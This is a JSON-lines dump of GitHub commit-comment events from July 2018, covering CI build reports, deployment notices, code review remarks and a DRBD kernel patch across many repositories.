{"id":"7948957254","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29668549,"position":null,"line":null,"path":null,"commit_id":"8f79be4dd0f0d6a2d0d9fa6641f61a7639ab9c96","created_at":"2018-07-11T09:46:26Z","updated_at":"2018-07-11T09:46:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-094624 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-094624\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T09:46:26Z"}
{"id":"7948967203","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29668564,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-11T09:48:10Z","updated_at":"2018-07-11T09:48:10Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2961 of 2970 tests passed, 29 test warnings)\n\nMessages:\n\n * 16 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 4\n\nregression Test Summary\n * Passed: 638\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T09:48:10Z"}
{"id":"7948968653","type":"CommitCommentEvent","actor":{"login":"EnricoDonatoni"},"repo":{"name":"EnricoDonatoni/donatonilugliomondiali"},"payload":{"comment":{"id":29668566,"position":null,"line":null,"path":null,"commit_id":"a025db8dacff6ed74d82c657aaecdf8d3222ebf4","created_at":"2018-07-11T09:48:24Z","updated_at":"2018-07-11T09:48:24Z","author_association":"OWNER","body":"__API Description file syntax error on line 13__: bad indentation of a mapping entry (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T09:48:24Z"}
{"id":"7948970918","type":"CommitCommentEvent","actor":{"login":"saper"},"repo":{"name":"Guitarheroua/libsass-for-qt"},"payload":{"comment":{"id":29668571,"position":null,"line":null,"path":null,"commit_id":"c6882ccd5600d3749b7ab5355386ba60e592186b","created_at":"2018-07-11T09:48:50Z","updated_at":"2018-07-11T09:48:50Z","author_association":"NONE","body":"@sass would that break anything in the sass syntax? @nex3 "}},"created_at":"2018-07-11T09:48:50Z"}
{"id":"7948971027","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29668572,"position":19,"line":2011,"path":"src/CodeGen_Hexagon.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-11T09:48:51Z","updated_at":"2018-07-11T09:48:51Z","author_association":"COLLABORATOR","body":"Yes Changed "}},"created_at":"2018-07-11T09:48:51Z"}
{"id":"7948971404","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29668573,"position":1,"line":731,"path":"src/LLVM_Runtime_Linker.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-11T09:48:56Z","updated_at":"2018-07-11T09:48:56Z","author_association":"COLLABORATOR","body":"Not sure, but this is not related to size of Locked Cache"}},"created_at":"2018-07-11T09:48:56Z"}
{"id":"7948971972","type":"CommitCommentEvent","actor":{"login":"sebbefar"},"repo":{"name":"bensandland/PATS-create_template"},"payload":{"comment":{"id":29668577,"position":138,"line":82,"path":"func.rb","commit_id":"b70d7aea2f51af31298613c6e9ea08693a3c5f67","created_at":"2018-07-11T09:49:02Z","updated_at":"2018-07-11T09:49:02Z","author_association":"NONE","body":":O"}},"created_at":"2018-07-11T09:49:02Z"}
{"id":"7948972977","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29668578,"position":13,"line":60,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-11T09:49:13Z","updated_at":"2018-07-11T09:49:13Z","author_association":"COLLABORATOR","body":"Temp is a local variable, until we link it to global variable. There is no need to protect it at that place "}},"created_at":"2018-07-11T09:49:13Z"}
{"id":"7948975766","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29668581,"position":null,"line":null,"path":null,"commit_id":"b0046b8c1d9f07c75e63fbf067275f98d7837dab","created_at":"2018-07-11T09:49:44Z","updated_at":"2018-07-11T09:49:44Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/77288825-d6e8-4e47-9dba-737e8ff966d2?project=153942441948"}},"created_at":"2018-07-11T09:49:44Z"}
{"id":"7948980174","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29668584,"position":null,"line":null,"path":null,"commit_id":"ef44ee15f4bdc5a215ff05c8c0a527e35d4c0df5","created_at":"2018-07-11T09:50:31Z","updated_at":"2018-07-11T09:50:31Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180711-095030 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180711-095030\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-11T09:50:31Z"}
{"id":"7948985456","type":"CommitCommentEvent","actor":{"login":"Ask-Pillar"},"repo":{"name":"Ask-Pillar/Deliever"},"payload":{"comment":{"id":29668591,"position":null,"line":null,"path":null,"commit_id":"fc86b2ca08ba0ebfa7c133213cf690a8dc738453","created_at":"2018-07-11T09:51:28Z","updated_at":"2018-07-11T09:51:28Z","author_association":"OWNER","body":"可合并\r\n"}},"created_at":"2018-07-11T09:51:28Z"}
{"id":"7948987751","type":"CommitCommentEvent","actor":{"login":"mikeh007"},"repo":{"name":"mkubecek/vmware-host-modules"},"payload":{"comment":{"id":29668594,"position":null,"line":null,"path":null,"commit_id":"562121d7bc0606a104e876d77fd117223ee42ac3","created_at":"2018-07-11T09:51:51Z","updated_at":"2018-07-11T09:51:51Z","author_association":"NONE","body":"Hi,   may I ask for some expert guidance here.. ?     do I understand correctly,    the above may be the solution to the issues seen at  #241 \r\n [ https://github.com/abperiasamy/rtl8812AU_8821AU_linux/issues/241  ]  ?\r\n\r\nIf so could some one tell me how to get these changes into an 18.04 Ubuntu installation so that I can press on and compile new TPLINK Wifi Drivers (whose  make install   step falls over currently in the mode described within #241)   ?\r\n\r\nI'm not an expert developer and am unclear how/where the above three 'vmmon' files go to sort this.   Does this require a complete kernel recompile ? \r\n\r\nMany thanks in advance\r\n\r\nMike\r\nLondon\r\n\r\n"}},"created_at":"2018-07-11T09:51:51Z"}
{"id":"7948992111","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29668600,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-11T09:52:39Z","updated_at":"2018-07-11T09:52:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T09:52:39Z"}
{"id":"7948995428","type":"CommitCommentEvent","actor":{"login":"Sheikhipour"},"repo":{"name":"Sheikhipour/masterThesis"},"payload":{"comment":{"id":29668603,"position":null,"line":null,"path":null,"commit_id":"01559b398ab6ace3b0c96053cab71049504881ac","created_at":"2018-07-11T09:53:15Z","updated_at":"2018-07-11T09:53:15Z","author_association":"OWNER","body":"salam"}},"created_at":"2018-07-11T09:53:15Z"}
{"id":"7948999805","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29668608,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-11T09:54:06Z","updated_at":"2018-07-11T09:54:06Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T09:54:06Z"}
{"id":"7949005096","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668614,"position":66,"line":116,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-11T09:55:03Z","updated_at":"2018-07-11T09:55:03Z","author_association":"NONE","body":"In here, the advantage is reducing gas cost. If you use the variable that already exists, you don't expend more than necessary."}},"created_at":"2018-07-11T09:55:03Z"}
{"id":"7949008691","type":"CommitCommentEvent","actor":{"login":"RoseTeague"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29668617,"position":null,"line":null,"path":null,"commit_id":"d5b5697b9324873d590824946b71c6099094aa9e","created_at":"2018-07-11T09:55:43Z","updated_at":"2018-07-11T09:55:43Z","author_association":"COLLABORATOR","body":"Excellent, thanks! \r\n\r\nI haven't put a massive amount of thought into the init function, I just wanted something to allow you to change the system you're studying in the main() file rather than having to navigate to different scripts. "}},"created_at":"2018-07-11T09:55:43Z"}
{"id":"7949016948","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668634,"position":1,"line":1,"path":"README.md","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-11T09:57:14Z","updated_at":"2018-07-11T09:57:14Z","author_association":"NONE","body":"Remittance?"}},"created_at":"2018-07-11T09:57:14Z"}
{"id":"7949023189","type":"CommitCommentEvent","actor":{"login":"ababup1192"},"repo":{"name":"ababup1192/vue-elm-grid-example"},"payload":{"comment":{"id":29668641,"position":null,"line":null,"path":null,"commit_id":"e21e269ed55434f2912d3214754af169af05178f","created_at":"2018-07-11T09:58:20Z","updated_at":"2018-07-11T09:58:20Z","author_association":"OWNER","body":"正直、見やすいです。\r\n行数をなんとか減らしたかったと言う苦肉の策"}},"created_at":"2018-07-11T09:58:20Z"}
{"id":"7949023328","type":"CommitCommentEvent","actor":{"login":"refi93"},"repo":{"name":"vacuumlabs/cardanolite"},"payload":{"comment":{"id":29668642,"position":4,"line":201,"path":"public_wallet_app/css/styles.css","commit_id":"f7f56118374c12a31b3e53d72689c802ac4a921a","created_at":"2018-07-11T09:58:21Z","updated_at":"2018-07-11T09:58:21Z","author_association":"COLLABORATOR","body":"this causes the tooltip over the \"eye\" icon in receive addresses to show improperly (the bubble does not show, only the bottom of it)"}},"created_at":"2018-07-11T09:58:21Z"}
{"id":"7949024495","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29668651,"position":null,"line":null,"path":null,"commit_id":"d33bac539c5b126ec86c5ac89892520119725d50","created_at":"2018-07-11T09:58:32Z","updated_at":"2018-07-11T09:58:32Z","author_association":"CONTRIBUTOR","body":"Wow, removing support for `@deprecated` for types and callbacks and `@since` all together really simplifies the code."}},"created_at":"2018-07-11T09:58:32Z"}
{"id":"7949025298","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668653,"position":113,"line":113,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-11T09:58:40Z","updated_at":"2018-07-11T09:58:40Z","author_association":"NONE","body":"Yep, Splitter over again"}},"created_at":"2018-07-11T09:58:40Z"}
{"id":"7949026791","type":"CommitCommentEvent","actor":{"login":"einarjh"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29668655,"position":null,"line":null,"path":null,"commit_id":"24c49213e214cd89c3d846ece0745f210069f945","created_at":"2018-07-11T09:58:54Z","updated_at":"2018-07-11T09:58:54Z","author_association":"NONE","body":"I see from your commit message that firefox-esr isn't new enough for browsh, so wouldn't this change just trigger a lot of bug reports when people try to install browsh on debian, and then can't get it to run?"}},"created_at":"2018-07-11T09:58:54Z"}
{"id":"7949029056","type":"CommitCommentEvent","actor":{"login":"Philipp-Reisner"},"repo":{"name":"LINBIT/drbd-9.0"},"payload":{"comment":{"id":29668657,"position":17,"line":867,"path":"drbd/drbd_nl.c","commit_id":"6b3c69c40affc72ecfb542df05c4579a27a71659","created_at":"2018-07-11T09:59:20Z","updated_at":"2018-07-11T09:59:20Z","author_association":"CONTRIBUTOR","body":"Hi Pavel,\n\nthanks for reporting this. Are you in the position to reproduce this?\nif not, I will take the time to reproduce it and verify the fix.\n\nHere is my proposed fix:\n\nFrom ea30b07f45337464d1aa42207753502de36398f4 Mon Sep 17 00:00:00 2001\nFrom: Philipp Reisner <philipp.reisner@linbit.com>\nDate: Wed, 11 Jul 2018 11:51:03 +0200\nSubject: [PATCH] drbd: fix hanging demote after IO error\n\nPavel Klevtsov reported:\n  This call hungs in the next case:\n  1. Start writing to Primary node (A)\n  2. Get IOError & Disconnect on Secondary node (B)\n  3. Continue writing to A\n  4. Stop writing to A\n  5. Connect & Resync B -> UpToDate\n  6. Try to change role A (from primary to secondary)\n  7. Hanging till Disconnect B\n\nThe patch is sufficient. The possible race that finish_state_change() clears\nthe bit after a drbdsetup demote tested the bit is no problem, since then\nthe disk state will change to D_UNKNOWN and the sleeping drbdsetup will\nwaiter will be woken.\n---\n drbd/drbd_state.c | 2 ++\n 1 file changed, 2 insertions(+)\n\ndiff --git a/drbd/drbd_state.c b/drbd/drbd_state.c\nindex ca5df67..2db1675 100644\n--- a/drbd/drbd_state.c\n+++ b/drbd/drbd_state.c\n@@ -2397,6 +2397,8 @@ static void finish_state_change(struct drbd_resource *resource, struct completio\n                                    disk_state[NEW] == D_UP_TO_DATE)\n                                        create_new_uuid = true;\n                        }\n+\n+                       clear_bit(GOT_NEG_ACK, &peer_device->flags);\n                }\n \n                if (disk_state[OLD] >= D_INCONSISTENT && disk_state[NEW] < D_INCONSISTENT &&\n-- \n2.7.4\n\n\n-- \nLINBIT | Keeping The Digital World Running\n\nDRBD® and LINBIT® are registered trademarks of LINBIT, Austria.\n\n\n\n"}},"created_at":"2018-07-11T09:59:20Z"}
{"id":"7953215964","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29678623,"position":null,"line":null,"path":null,"commit_id":"298a4c20f674a87dda9bedaedec793cf2266585b","created_at":"2018-07-12T00:03:17Z","updated_at":"2018-07-12T00:03:17Z","author_association":"COLLABORATOR","body":"<h3>Publish</h3>\n\nPreview: <strong><a href='https://18516-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18516-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18516-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-12T00:03:17Z"}
{"id":"7953219242","type":"CommitCommentEvent","actor":{"login":"TheOneEyedGrimReaper"},"repo":{"name":"noahc3/auto-h-encore"},"payload":{"comment":{"id":29678626,"position":null,"line":null,"path":null,"commit_id":"6538f6c1040d83c0131ea7052c0cbd2949df69a3","created_at":"2018-07-12T00:04:34Z","updated_at":"2018-07-12T00:04:34Z","author_association":"NONE","body":"Hi Can u add my hungarian translation?\r\n[https://www107.zippyshare.com/v/uIdOB5ea/file.html\r\n](url)"}},"created_at":"2018-07-12T00:04:34Z"}
{"id":"7953219594","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"nathanchance/op6"},"payload":{"comment":{"id":29678628,"position":null,"line":null,"path":null,"commit_id":"50eb30ddaa2da42a24326c75eb0385b8eb079395","created_at":"2018-07-12T00:04:44Z","updated_at":"2018-07-12T00:04:44Z","author_association":"NONE","body":"What the duck OnePlus, what the duck..."}},"created_at":"2018-07-12T00:04:44Z"}
{"id":"7953219943","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678631,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T00:04:53Z","updated_at":"2018-07-12T00:04:53Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T00:04:53Z"}
{"id":"7953230272","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29678643,"position":null,"line":null,"path":null,"commit_id":"48ccdf322d9e7a68d0caf5833511ee3e53ec7d3a","created_at":"2018-07-12T00:08:37Z","updated_at":"2018-07-12T00:08:37Z","author_association":"CONTRIBUTOR","body":"First of all, it's `fixedPoint`, second, the arguments are switched, third, even then, the result still isn't the same as previously.\r\n\r\n```nix\r\n(self_: let super = f self_; in super // g super self_) # original\r\n(lib.fixed-points.extends f g) # now\r\n(lib.fixedPoints.extends f g) # fixed attribute\r\n(lib.fixedPoints.extends g f) # fixed arguments\r\n# extends = f: rattrs: self: let super = rattrs self; in super // f self super; # definition of extends\r\n(self: let super = f self; in super // g self super) # extends expanded\r\n```\r\n\r\nNote how `self` and `super` have the wrong order, leading to infinite recursion.\r\n\r\nReverted in 4794aa5de23 :)"}},"created_at":"2018-07-12T00:08:37Z"}
{"id":"7953230514","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29678644,"position":null,"line":null,"path":null,"commit_id":"4794aa5de233b5bf2d1c3245946379699d023467","created_at":"2018-07-12T00:08:43Z","updated_at":"2018-07-12T00:08:43Z","author_association":"MEMBER","body":"Any time you revert a commit, please extend the commit message to say why you reverted it. So, why the revert? :)"}},"created_at":"2018-07-12T00:08:43Z"}
{"id":"7953232807","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678652,"position":null,"line":null,"path":null,"commit_id":"5ea52dbf1da2fa0a6d2bc68f567d69067a870468","created_at":"2018-07-12T00:09:39Z","updated_at":"2018-07-12T00:09:39Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: OK (3309 of 3309 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ea52dbf1da2fa0a6d2bc68f567d69067a870468-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ea52dbf1da2fa0a6d2bc68f567d69067a870468-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T00:09:39Z"}
{"id":"7953234066","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29678653,"position":null,"line":null,"path":null,"commit_id":"4794aa5de233b5bf2d1c3245946379699d023467","created_at":"2018-07-12T00:10:10Z","updated_at":"2018-07-12T00:10:10Z","author_association":"CONTRIBUTOR","body":"@grahamc Ah right, the discussion is in the reverted commit"}},"created_at":"2018-07-12T00:10:10Z"}
{"id":"7953236109","type":"CommitCommentEvent","actor":{"login":"doutriaux1"},"repo":{"name":"PCMDI/pcmdi_metrics"},"payload":{"comment":{"id":29678657,"position":null,"line":null,"path":null,"commit_id":"02fd8c28b9b8c9332933a30efcb96cb209ed2029","created_at":"2018-07-12T00:10:55Z","updated_at":"2018-07-12T00:10:55Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-12T00:10:55Z"}
{"id":"7953243491","type":"CommitCommentEvent","actor":{"login":"ContainedBlargh"},"repo":{"name":"WingCorp/jart"},"payload":{"comment":{"id":29678674,"position":null,"line":null,"path":null,"commit_id":"84e94cd973a5e78e94dd1c446ec1905c4da04553","created_at":"2018-07-12T00:13:49Z","updated_at":"2018-07-12T00:13:49Z","author_association":"MEMBER","body":"Git gik amok over at der har været en tom fil med navn KdTree.kt, men med en anden casing.\r\nDen påtvang at jeg mergede, men den ville ikke gemme mine changes uanset hvad, så skiftede til konsollen og renamede skidtet. Men så endte min commit besked med at blive sat på samme linje med et fuckload mellemrum 👎  :("}},"created_at":"2018-07-12T00:13:49Z"}
{"id":"7953243976","type":"CommitCommentEvent","actor":{"login":"hufort"},"repo":{"name":"hufort/Sprouted-Kitchen-Recipe-Card"},"payload":{"comment":{"id":29678675,"position":4,"line":6,"path":"viewsReact/recipeCard.jsx","commit_id":"164d2ddbc4d31c69269937b8851a072e42b4598c","created_at":"2018-07-12T00:14:02Z","updated_at":"2018-07-12T00:14:02Z","author_association":"OWNER","body":"@sahandnayebaziz here's the ES6 import that is working on codesandbox... not so much in the real app. Thanks dude."}},"created_at":"2018-07-12T00:14:02Z"}
{"id":"7953244459","type":"CommitCommentEvent","actor":{"login":"fredcrint"},"repo":{"name":"fredcrint/docoraptor"},"payload":{"comment":{"id":29678679,"position":null,"line":null,"path":null,"commit_id":"dcac30427b769c6dba0c5dd292cb660ab2ea6c3d","created_at":"2018-07-12T00:14:12Z","updated_at":"2018-07-12T00:14:12Z","author_association":"OWNER","body":"How do i get this to show in desktop?"}},"created_at":"2018-07-12T00:14:12Z"}
{"id":"7953244972","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29678680,"position":null,"line":null,"path":null,"commit_id":"4794aa5de233b5bf2d1c3245946379699d023467","created_at":"2018-07-12T00:14:25Z","updated_at":"2018-07-12T00:14:25Z","author_association":"MEMBER","body":"Cool, see: https://github.com/NixOS/nixpkgs/commit/48ccdf322d9e7a68d0caf5833511ee3e53ec7d3a"}},"created_at":"2018-07-12T00:14:25Z"}
{"id":"7953249199","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29678688,"position":null,"line":null,"path":null,"commit_id":"4794aa5de233b5bf2d1c3245946379699d023467","created_at":"2018-07-12T00:16:04Z","updated_at":"2018-07-12T00:16:04Z","author_association":"CONTRIBUTOR","body":"(There's a link to that right under the commits subject as well)"}},"created_at":"2018-07-12T00:16:04Z"}
{"id":"7953251656","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678692,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-12T00:17:04Z","updated_at":"2018-07-12T00:17:04Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.01%25-green.png)</a>\n"}},"created_at":"2018-07-12T00:17:04Z"}
{"id":"7953256589","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29678700,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-12T00:19:09Z","updated_at":"2018-07-12T00:19:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T00:19:09Z"}
{"id":"7953257182","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29678703,"position":null,"line":null,"path":null,"commit_id":"62350b4ec279649fc138bed6d4cf56745ba147ff","created_at":"2018-07-12T00:19:23Z","updated_at":"2018-07-12T00:19:23Z","author_association":"OWNER","body":"Also changed risky \"var\" keywords to \"let\" (I'm more accustomed to block scope)."}},"created_at":"2018-07-12T00:19:23Z"}
